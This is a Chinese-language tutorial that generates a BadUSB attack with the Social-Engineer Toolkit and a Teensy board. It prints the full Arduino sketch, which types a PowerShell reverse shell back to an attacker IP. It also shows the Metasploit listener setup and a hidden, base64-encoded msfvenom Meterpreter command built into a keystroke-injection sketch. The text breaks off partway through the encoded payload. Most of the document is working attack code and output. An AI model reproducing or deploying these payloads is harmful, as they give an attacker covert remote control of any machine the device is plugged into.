Setoolkit生成BadUSB攻击向量

关于如何制作badusb参考:用Teensy++2.0制作一个简单的关机BadUSB

启动Setoolkit:

setoolkit
[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                      Version: 7.7.5
                   Codename: 'Blackout'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.

     Join us on irc.freenode.net in channel #setoolkit

   The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

   It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!


 Select from the menu:

 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Return back to the main menu.

输入1选择社会工程学攻击

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules

输入6选择基于Arduino的攻击向量

 Select a payload to create the pde file to import into Arduino:

   1) Powershell HTTP GET MSF Payload
   2) WSCRIPT HTTP GET MSF Payload
   3) Powershell based Reverse Shell Payload
   4) Internet Explorer/FireFox Beef Jack Payload
   5) Go to malicious java site and accept applet Payload
   6) Gnome wget Download Payload
   7) Binary 2 Teensy Attack (Deploy MSF payloads)
   8) SDCard 2 Teensy Attack (Deploy Any EXE)
   9) SDCard 2 Teensy Attack (Deploy on OSX)
  10) X10 Arduino Sniffer PDE and Libraries
  11) X10 Arduino Jammer PDE and Libraries
  12) Powershell Direct ShellCode Teensy Attack
  13) Peensy Multi Attack Dip Switch + SDCard Attack
  14) HID Msbuild compile to memory Shellcode Attack

  99) Return to Main Menu

输入3选择生成基于powershell的reverse_tcp攻击向量

[*] INO file created. You can get it under '/root/.set/reportsteensy_2018-03-24 09:24:27.876891.ino'
[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino

[*] If your running into issues with VMWare Fusion and the start menu, uncheck
the 'Enable Key Mapping' under preferences in VMWare
Press {return} to continue.

由于是虚拟机,程序直接把代码输出到了~/.set/reports目录下

parrot]─[~/.set/reports]
└──╼ #ls
'teensy_2018-03-24 09:24:27.876891.ino'
┌─[root@parrot]─[~/.set/reports]
└──╼ #

查看内容:cat teensy_2018-03-24\ 09\:24\:27.876891.ino

//
// Social-Engineer Toolkit Teensy Attack Vector
// Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG)
//
// Special thanks to: Irongeek
// You will need to setup a netcat listener MSF cannot handle this payload
//
// 2011-02-28 padzero@gmail.com
// * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets
// * Changed from script to interactive powershell execution: Bypass Restricted Powershell Execution Policies
//

#define ascii_println Keyboard.println

void setup() { 
  delay(10000);
  omg("powershell");
  delay(1000);
  // Here is the payload...
  // This is a reverse bind shell through powershell.  I need to fix it use the 
  // bind shell.  The reverse bind shell code is cleaner though.
  // I bet we could use the dip switches to configure the IP addy or port...
  ascii_println("function cleanup {");
  ascii_println("if ($client.Connected -eq $true) {$client.Close()}");
  ascii_println("if ($process.ExitCode -ne $null) {$process.Close()}");
  ascii_println("exit}");
  // Setup 192.168.1.1 HERE
  ascii_println("$address = '192.168.1.1'");
  // Setup PORT HERE
  ascii_println("$port = '4444'");
  ascii_println("$client = New-Object system.net.sockets.tcpclient");
  ascii_println("$client.connect($address,$port)");
  ascii_println("$stream = $client.GetStream()");
  ascii_println("$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize");
  ascii_println("$process = New-Object System.Diagnostics.Process");
  ascii_println("$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'");
  ascii_println("$process.StartInfo.RedirectStandardInput = 1");
  ascii_println("$process.StartInfo.RedirectStandardOutput = 1");
  ascii_println("$process.StartInfo.UseShellExecute = 0");
  ascii_println("$process.Start()");
  ascii_println("$inputstream = $process.StandardInput");
  ascii_println("$outputstream = $process.StandardOutput");
  ascii_println("Start-Sleep 1");
  ascii_println("$encoding = new-object System.Text.AsciiEncoding");
  ascii_println("while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}");
  ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.Length)");
  ascii_println("$out = $null; $done = $false; $testing = 0;");
  ascii_println("while (-not $done) {");
  ascii_println("if ($client.Connected -ne $true) {cleanup}");
  ascii_println("$pos = 0; $i = 1");
  ascii_println("while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {");
  ascii_println("$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)");
  ascii_println("$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}");
  ascii_println("if ($pos -gt 0) {");
  ascii_println("$string = $encoding.GetString($networkbuffer,0,$pos)");
  ascii_println("$inputstream.write($string)");
  ascii_println("start-sleep 1");
  ascii_println("if ($process.ExitCode -ne $null) {cleanup}");
  ascii_println("else {");
  ascii_println("$out = $encoding.GetString($outputstream.Read())");
  ascii_println("while($outputstream.Peek() -ne -1){");
  ascii_println("$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}");
  ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.length)");
  ascii_println("$out = $null");
  ascii_println("$string = $null}} else {cleanup}}");
  ascii_println(""); //Enter to start execution
}

void loop() {
}

void omg(char *SomeCommand)
{
  Keyboard.set_modifier(128); 
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now(); 
  Keyboard.set_modifier(0); 
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
  delay(1500);
  ascii_println(SomeCommand);
}

ascii_println("$address = '192.168.1.1'");这里设置回连地址

修改之后把代码放入Arduino然后烧录进teensy2.0++

在Parrot中启动msf handler进行监听

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.59.128
LHOST => 192.168.59.128
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.59.128:4444 

把teensy 2.0 ++插入电脑

自动打开了powershell然后输入攻击向量

右边的监听器收到了shell


这是普通的reverse_tcp cmd shell,如果要生成meterpreter shell可以在上面选择1powershell HTTP GET MSF Payload这个需要把木马放在你的服务器上启动http server供目标机器下载执行

这里用另一种方式去获得Meterpreter shell

首先生成获得meterpreter shell 的cmd命令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.59.128 LPORT=4455 -f psh-cmd

生成的payload

%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEARQBsAFoAdABsAG8AQwBBADcAVgBXAGYAMgAvAGEATwBoAFQAOQB1ADUAUAAyAEgAYQBJAEoASwBZAGwARwBDAFYAQwAyAGIAcABVAG0AUABZAGMAUQBTAEEAcwBVAFMASQBFAEMAUQA1AE8AYgBPAE0ARgBnAFkAdQBZADQALwBOAHIAMgAzAGQAOABOAGsASwAxAFQAdQAvAGUAMgBKADcAMABJAGgARwBQAGYAYQA5ADkANwB6AHIAbgBYAEIARQBuAGsAUwBjAG8AagB4AGIAZABpAFoANgBGADgAZQBmAG4AaQByAEkATQBGAFgAaQBwAGEAagB0AG4AegBwAHAATgBYAGMAbwB2AFMAUQAwAE0ALwBPADQATwBWADMATAByAGUAVQB6ADQAbwAyAGcAUwB0AFYAaABaAGYAWQBoAHAATgByADYANgBxAGkAUgBBAGsAawBzAGYAMwBRAHAAMQBJAEYATQBkAGsAKwBjAEEAbwBpAFQAVgBkACsAYQBvAE0AWgAwAFMAUQA4ADkAdQBIAE8AZgBHAGsAOABrAFgASgBmAFMAcgBVAEcAWAAvAEEANwBHAFMAMgBxADIASgB2AFIAcABSAHoARgBQAG4AcABXAHAATgA3AE8ASQAyAG4ANABLADQAWQBsAFoAcgA2ADgAYQBPAHEAVAA4ADUATAAwADAATAB0AGMANABKAFoAcgBLAG4AdQBMAHAAWgBrAFcAZgBBAFoAVQAzAFgAbABtADUANABlAGUATABkAGIARQBVADEAdABVAFUALwB3AG0AQQBlAHkATQBLAFQAUgBSAGIAbgBRAGoAMgBJAGMAawBEAGIAcwB0AGkAWQB0AEkAbQBmAGMAagAxAFUAZABrAG8AQwBQAEkARABJAFIAawBaAEsAbQBrAC8AbwBmAFYAegBVAFYAaABoADMAQgBQAGUAVAA3AGcAcwBSAGcAWABIAEMAaQBOAFYAOABRAEwAUgBjAGwAagBPAFcAVgB2ADcAVABKADYAZgBCAGUARQBrAG0ANgBKAEwAQQB1AGkAZQBBAHIAbAA0AGcAMQA5AFUAaABjAGEATwBEAEkAWgA2AFIASABnAHEAbgBXAEoAcABzAHMANQA5ADkAMQAwAGgANAA3AGcAVgBWAEgAQwBqADAAUABQAEQAeQBOAHMAcwBYADkAaABKAEcAagBvADYAbwAvAGoAZgBOAEkAbgBRADUAUABSAGgAOABrAC8AdQAzAGwAaQA1AGMAdgBnAG8AeAB1ADAAUgA3ADcAagA5AG0ARwAwAGQAbgBrAE0AQwBZAFEAbgB0AGIAaABNAFQAMwBZAGYAVgBDAEsAZQBhAFUARgBKADIASABKAHgAUQA1AGUAYwAzAGMAaQBJAGYAcABVAG0AYQBTAG8AVAA2AFoAVABKAGIAZABaADAAUAB5AHYAMwBVAHUAWgBMAFYAaABHAFEANQBpAFkARABEAGoAMQBwACsAQgB3AEkAaQBPADMAcgBLAFcAegB2ADUAYQBVAFIAUQBJAGEARQBXAHMAWAA0AFMAWAAxAE0AdABWAG8AegB5AEYATQBBAGsAWQBPADYAUgBVAHkAcwB6AFkARQBwAEsAbQBuAEIAZQBKAGIAaABKAEUAUQB5AHgAUwAwAHYARABKADUANgBsAFoAYgBVAHYAbgBkADEAMAB3AG8AOAA0AGwAQQBIAHIAQQBVAFEAMQBSAEEAbwBQADUAegBNAEUAYwBlAE4ATgBXAEoAVwBtAFEASgA4AEIAegBmAFYAUQBBADkAQQBLADIAUwB6AFAAcQBrAHoAMQAxADIAZQB2AG8ATwBSAG0AcQBWADQAVABqAE8ASwA1ADAARQBpAHMAWABMAEsAeQA3AEIAagBQAGgANQBCAFUAVQB4AFAAUwAyAGgAUgBQAEwARABVAFAAMABSAGIAaQB0AGgAawBuAG8ANABsAHQAbAAyAFUALwAyAEkANAB1AG0AMABLAG8AOQBpAEsAUgBJAFAAKwBJAEwATQA3ADkAdwBWADgAUwBoAG0ASwBSAEIANQBwAFUARgA5AFkAdQA1AGMARwBtAGEAbgBxAHMALwBDAFUATQBXAE0AMABTAGkARQBuAGQAWgBBAEEAOAB5AGsANgBiAHMAeQBWAFkARwBBAEEARgBQAEcAOQBZAEoATABwAEwATgBjAE0AYgBJAEUAawAwAFAASgAyAGcAeQBIAFUASwBBAG4AbgBSADkAVQBnADAAUABpAHEAegArAEgAbAA4AG4ANABxAE4AawBVAGgAaQB6AC8AUgA4AEUAQgB0AHkANwBqAE0AcQA4AE0AcQBKAEIAUQA5AHkAbQBrADAAZgBBAC8AbgBmAHkAbwAzAEMARwBHAHEAaQBBAG4AQQByAFMAcwBKAEMAYgBtAFQAcQBaAEMAegBnAFcAZgAyAG4AaQBVAFMAdgBFAEUAeQBDAEYAOQBJAFMARgAxAFcALwBDAGwAaQBXAFAAeQB0AHUASgBLAEEAYwBCAG8AcgA0AHgAYgBXAGsAWAB3AGoASgB5AEkAdABUAHgAegBRAFUAdABvAFEAMAB0AE8AQwA3ADUAOQBlAHUARgB3ADYAOQBLAC8AdQBaADQAMwBEAEcARgB0AFoAdwBGAHkAWQBxAGYAVgA2AEYAagBkAFIAcQBPAHkAdgBuAFkASABGAGUAbgBXAEgASABuAFQAYwBXAFMAcgBkAGoAKwBmAHUANgBqAFIANgA0AC8AawAyAEUARwBOAE8AMQBwAGMAagBDAHIANwAxAFQAWABkAHUAMAAzAGsAagA3AGIARwAyADcAMgA1ADMAeABUAE4ANwBYADQAZQArAHMASABJAEMAbwBMAHcATQBuAEIANwBwAFQAYwAyAGIAUQA2AHIAWABiAE4AWQB4AGsAMgByAGwAagBTAEgANQBzAFkAcwBWAHUASQBhADMAVABTADYAdABOADkAZABYAE4AdgB5AFkAVABSAGcAdQBCADgAWQA0AFgAMwBwAFAAYQBiAGIAcABwAGcAUABTAHIAeQAxAGQAeABDAHEAegB5ADYAOAAvAFgAVQB3AHEATQA5AGEALwBtADcAVQBNAE4ANABQAEsAdwB0AFUAUQA2AGcAYQAxAFEAYQAyAHkAVwA5AEcAcABrAEEAZABZADQARABEAEYAZAAvAGMAaABKAGQAaABQAGEAdwBpADAALwBZAG8ARwBYAGYANwB0AHQAbgB0ADIAaQBiAHEAMQArAGUAZgByAGYAZABHAEMATAA3ADMAZQBHAFkATwBCADIAVQA2AFgAdAAzADMAWgB2AEIAdQBRAHcAZwAzAFIAcgBIAGkAKwBHAFQAUABSADEAMABBAHEAYwA0AFIARABuAHQAZwBFADEAYgBMADMAaQB3AEEARwArAHMAMQBNAGwAKwAzAGUAVgB6AEcAQwA1AE0AagBFADIAegBzADgAVwBlAEkAYQA3AFMAeQBPAHcAegBXADcALwBwAGwAagBnAGEAcwBmAFkAOQBSAGMANwB5AHoARABhAE0AMAA2AGwAUgBRAG8AMABpAEgAOQBSAEMAbABXACsATABRADcARwBJAFUAcgA2ADIAOQBaAFoAUQBHAFAAdgBlAEgAYgA5AHEAagB3AEIAagBjAHMAMAB2AEQAcQB0ADYAdAB2AE0AQQB3AGoARQAzAEQAdQB2AEgARwBwAGUAMgA3ADIAOAB0ADMAegBTAEUAZABMAEQAbgBxAEcAOABiAGcAVgBTAG8ATAAwAEUAVgBPAE4AaAA2AHgALwBhAHYAMgAzAE0ASQBpAG4AbQBFAEcASwBvAEQARwBtADUAVwBjAHoAWQBWADkANgBxAFEAZABUAGwATQBQAFQAVAB0AGUAbwBBAHMAaQBJAHMATABnACsAbwBFAEwASwBsAE0AdgBZAG8AeAA3AGEAUwBzAC8ATgBGADIANABSAG8ANwBOAGYAUQBxADEAMQA0AGYAaABSAGYAbgBaAGsAYQA1ADgATgA5AFIALwA5AFAAaABzADYAdQBwAHEARABHAEcAbQBuAFMAWgBWAGIAYQBGAEoAbwBsAEQATwA4AHMAWAB0AFIAYgBFAEkARABiAHUANAByAFIAUQBoAHkAOQAvAFAAcgBjAHAAWABPACsAMgA0AFYAegA3AHQAKwBJAEQATgA5ADcAMwBaAFkAVwA4ADkAcgBaAFgAYwBQAGoAYgBYADYASAA5AEcANwBWAFMAagBNAC8AagB4AC8AdwAyADEASAAzAFAALwBzAFAAcABiAFMAQgBiAHoAYQBjADUAUABKAG4AKwBlACsAQwBOAE0ALwB6AHoAegBJAGEAWQBTAFQARgAxAG8ATQBZAHcAYwA3ADcAYgBuAEEAVABnAHAANQBOAEgAVgBmAHkAQQBHACsAQQA5AE8AVAAvAHIAUAA2AHoAYQBSADUAMgAzADQAUwAvAEEAMwA5AGsANgBJAEcATwBRAEoAQQBBAEEAPQAnACcAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA

然后用之前制作简单关机的代码修改一下

把之前输出的关机指令换成上面的payload

#include "Keyboard.h"


/* Init function */
void setup()
{
  // Begining the Keyboard stream
  Keyboard.begin();

  // Wait 500ms
  delay(500);
  delay(3000);

  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();

  delay(500);

  Keyboard.print("cmd");

  delay(1000);

  Keyboard.press(KEY_RETURN);
  delay(50);
  Keyboard.release(KEY_RETURN);

  delay(1000);
  Keyboard.print("%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEARQBsAFoAdABsAG8AQwBBADcAVgBXAGYAMgAvAGEATwBoAFQAOQB1ADUAUAAyAEgAYQBJAEoASwBZAGwARwBDAFYAQwAyAGIAcABVAG0AUABZAGMAUQBTAEEAcwBVAFMASQBFAEMAUQA1AE8AYgBPAE0ARgBnAFkAdQBZADQALwBOAHIAMgAzAGQAOABOAGsASwAxAFQAdQAvAGUAMgBKADcAMABJAGgARwBQAGYAYQA5ADkANwB6AHIAbgBYAEIARQBuAGsAUwBjAG8AagB4AGIAZABpAFoANgBGADgAZQBmAG4AaQByAEkATQBGAFgAaQBwAGEAagB0AG4AegBwAHAATgBYAGMAbwB2AFMAUQAwAE0ALwBPADQATwBWADMATAByAGUAVQB6ADQAbwAyAGcAUwB0AFYAaABaAGYAWQBoAHAATgByADYANgBxAGkAUgBBAGsAawBzAGYAMwBRAHAAMQBJAEYATQBkAGsAKwBjAEEAbwBpAFQAVgBkACsAYQBvAE0AWgAwAFMAUQA4ADkAdQBIAE8AZgBHAGsAOABrAFgASgBmAFMAcgBVAEcAWAAvAEEANwBHAFMAMgBxADIASgB2AFIAcABSAHoARgBQAG4AcABXAHAATgA3AE8ASQAyAG4ANABLADQAWQBsAFoAcgA2ADgAYQBPAHEAVAA4ADUATAAwADAATAB0AGMANABKAFoAcgBLAG4AdQBMAHAAWgBrAFcAZgBBAFoAVQAzAFgAbABtADUANABlAGUATABkAGIARQBVADEAdABVAFUALwB3AG0AQQBlAHkATQBLAFQAUgBSAGIAbgBRAGoAMgBJAGMAawBEAGIAcwB0AGkAWQB0AEkAbQBmAGMAagAxAFUAZABrAG8AQwBQAEkARABJAFIAawBaAEsAbQBrAC8AbwBmAFYAegBVAFYAaABoADMAQgBQAGUAVAA3AGcAcwBSAGcAWABIAEMAaQBOAFYAOABRAEwAUgBjAGwAagBPAFcAVgB2ADcAVABKADYAZgBCAGUARQBrAG0ANgBKAEwAQQB1AGkAZQBBAHIAbAA0AGcAMQA5AFUAaABjAGEATwBEAEkAWgA2AFIASABnAHEAbgBXAEoAcABzAHMANQA5ADkAMQAwAGgANAA3AGcAVgBWAEgAQwBqADAAUABQAEQAeQBOAHMAcwBYADkAaABKAEcAagBvADYAbwAvAGoAZgBOAEkAbgBRADUAUABSAGgAOABrAC8AdQAzAGwAaQA1AGMAdgBnAG8AeAB1ADAAUgA3ADcAagA5AG0ARwAwAGQAbgBrAE0AQwBZAFEAbgB0AGIAaABNAFQAMwBZAGYAVgBDAEsAZQBhAFUARgBKADIASABKAHgAUQA1AGUAYwAzAGMAaQBJAGYAcABVAG0AYQBTAG8AVAA2AFoAVABKAGIAZABaADAAUAB5AHYAMwBVAHUAWgBMAFYAaABHAFEANQBpAFkARABEAGoAMQBwACsAQgB3AEkAaQBPADMAcgBLAFcAegB2ADUAYQBVAFIAUQBJAGEARQBXAHMAWAA0AFMAWAAxAE0AdABWAG8AegB5AEYATQBBAGsAWQBPADYAUgBVAHkAcwB6AFkARQBwAEsAbQBuAEIAZQBKAGIAaABKAEUAUQB5AHgAUwAwAHYARABKADUANgBsAFoAYgBVAHYAbgBkADEAMAB3AG8AOAA0AGwAQQBIAHIAQQBVAFEAMQBSAEEAbwBQADUAegBNAEUAYwBlAE4ATgBXAEoAVwBtAFEASgA4AEIAegBmAFYAUQBBADkAQQBLADIAUwB6AFAAcQBrAHoAMQAxADIAZQB2AG8ATwBSAG0AcQBWADQAVABqAE8ASwA1ADAARQBpAHMAWABMAEsAeQA3AEIAagBQAGgANQBCAFUAVQB4AFAAUwAyAGgAUgBQAEwARABVAFAAMABSAGIAaQB0AGgAawBuAG8ANABsAHQAbAAyAFUALwAyAEkANAB1AG0AMABLAG8AOQBpAEsAUgBJAFAAKwBJAEwATQA3ADkAdwBWADgAUwBoAG0ASwBSAEIANQBwAFUARgA5AFkAdQA1AGMARwBtAGEAbgBxAHMALwBDAFUATQBXAE0AMABTAGkARQBuAGQAWgBBAEEAOAB5AGsANgBiAHMAeQBWAFkARwBBAEEARgBQAEcAOQBZAEoATABwAEwATgBjAE0AYgBJAEUAawAwAFAASgAyAGcAeQBIAFUASwBBAG4AbgBSADkAVQBnADAAUABpAHEAegArAEgAbAA4AG4ANABxAE4AawBVAGgAaQB6AC8AUgA4AEUAQgB0AHkANwBqAE0AcQA4AE0AcQBKAEIAUQA5AHkAbQBrADAAZgBBAC8AbgBmAHkAbwAzAEMARwBHAHEAaQBBAG4AQQByAFMAcwBKAEMAYgBtAFQAcQBaAEMAegBnAFcAZgAyAG4AaQBVAFMAdgBFAEUAeQBDAEYAOQBJAFMARgAxAFcALwBDAGwAaQBXAFAAeQB0AHUASgBLAEEAYwBCAG8AcgA0AHgAYgBXAGsAWAB3AGoASgB5AEkAdABUAHgAegBRAFUAdABvAFEAMAB0AE8AQwA3ADUAOQBlAHUARgB3ADYAOQBLAC8AdQBaADQAMwBEAEcARgB0AFoAdwBGAHkAWQBxAGYAVgA2AEYAagBkAFIAcQBPAHkAdgBuAFkASABGAGUAbgBXAEgASABuAFQAYwBXAFMAcgBkAGoAKwBmAHUANgBqAFIANgA0AC8AawAyAEUARwBOAE8AMQBwAGMAagBDAHIANwAxAFQAWABkAHUAMAAzAGsAagA3AGIARwAyADcAMgA1ADMAeABUAE4ANwBYADQAZQArAHMASABJAEMAbwBMAHcATQBuAEIANwBwAFQAYwAyAGIAUQA2AHIAWABiAE4AWQB4AGsAMgByAGwAagBTAEgANQBzAFkAcwBWAHUASQBhADMAVABTADYAdABOADkAZABYAE4AdgB5AFkAVABSAGcAdQBCADgAWQA0AFgAMwBwAFAAYQBiAGIAcABwAGcAUABTAHIAeQAxAGQAeABDAHEAegB5ADYAOAAvAFgAVQB3AHEATQA5AGEALwBtADcAVQBNAE4ANABQAEsAdwB0AFUAUQA2AGcAYQAxAFEAYQAyAHkAVwA5AEcAcABrAEEAZABZADQARABEAEYAZAAvAGMAaABKAGQAaABQAGEAdwBpADAALwBZAG8ARwBYAGYANwB0AHQAbgB0ADIAaQBiAHEAMQArAGUAZgByAGYAZABHAEMATAA3ADMAZQBHAFkATwBCADIAVQA2AFgAdAAzADMAWgB2AEIAdQBRAHcAZwAzAFIAcgBIAGkAKwBHAFQAUABSADEAMABBAHEAYwA0AFIARABuAHQAZwBFADEAYgBMADMAaQB3AEEARwArAHMAMQBNAGwAKwAzAGUAVgB6AEcAQwA1AE0AagBFADIAegBzADgAVwBlAEkAYQA3AFMAeQBPAHcAegBXADcALwBwAGwAagBnAGEAcwBmAFkAOQBSAGMANwB5AHoARABhAE0AMAA2AGwAUgBRAG8AMABpAEgAOQBSAEMAbABXACsATABRADcARwBJAFUAcgA2ADIAOQBaAFoAUQBHAFAAdgBlAEgAYgA5AHEAagB3AEIAagBjAHMAMAB2AEQAcQB0ADYAdAB2AE0AQQB3AGoARQAzAEQAdQB2AEgARwBwAGUAMgA3ADIAOAB0ADMAegBTAEUAZABMAEQAbgBxAEcAOABiAGcAVgBTAG8ATAAwAEUAVgBPAE4AaAA2AHgALwBhAHYAMgAzAE0ASQBpAG4AbQBFAEcASwBvAEQARwBtADUAVwBjAHoAWQBWADkANgBxAFEAZABUAGwATQBQAFQAVAB0AGUAbwBBAHMAaQBJAHMATABnACsAbwBFAEwASwBsAE0AdgBZAG8AeAA3AGEAUwBzAC8ATgBGADIANABSAG8ANwBOAGYAUQBxADEAMQA0AGYAaABSAGYAbgBaAGsAYQA1ADgATgA5AFIALwA5AFAAaABzADYAdQBwAHEARABHAEcAbQBuAFMAWgBWAGIAYQBGAEoAbwBsAEQATwA4AHMAWAB0AFIAYgBFAEkARABiAHUANAByAFIAUQBoAHkAOQAvAFAAcgBjAHAAWABPACsAMgA0AFYAegA3AHQAKwBJAEQATgA5ADcAMwBaAFkAVwA4ADkAcgBaAFgAYwBQAGoAYgBYADYASAA5AEcANwBWAFMAagBNAC8AagB4AC8AdwAyADEASAAzAFAALwBzAFAAcABiAFMAQgBiAHoAYQBjADUAUABKAG4AKwBlACsAQwBOAE0ALwB6AHoAegBJAGEAWQBTAFQARgAxAG8ATQBZAHcAYwA3ADcAYgBuAEEAVABnAHAANQBOAEgAVgBmAHkAQQBHACsAQQA5AE8AVAAvAHIAUAA2AHoAYQBSADUAMgAzADQAUwAvAEEAMwA5AGsANgBJAEcATwBRAEoAQQBBAEEAPQAnACcAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZ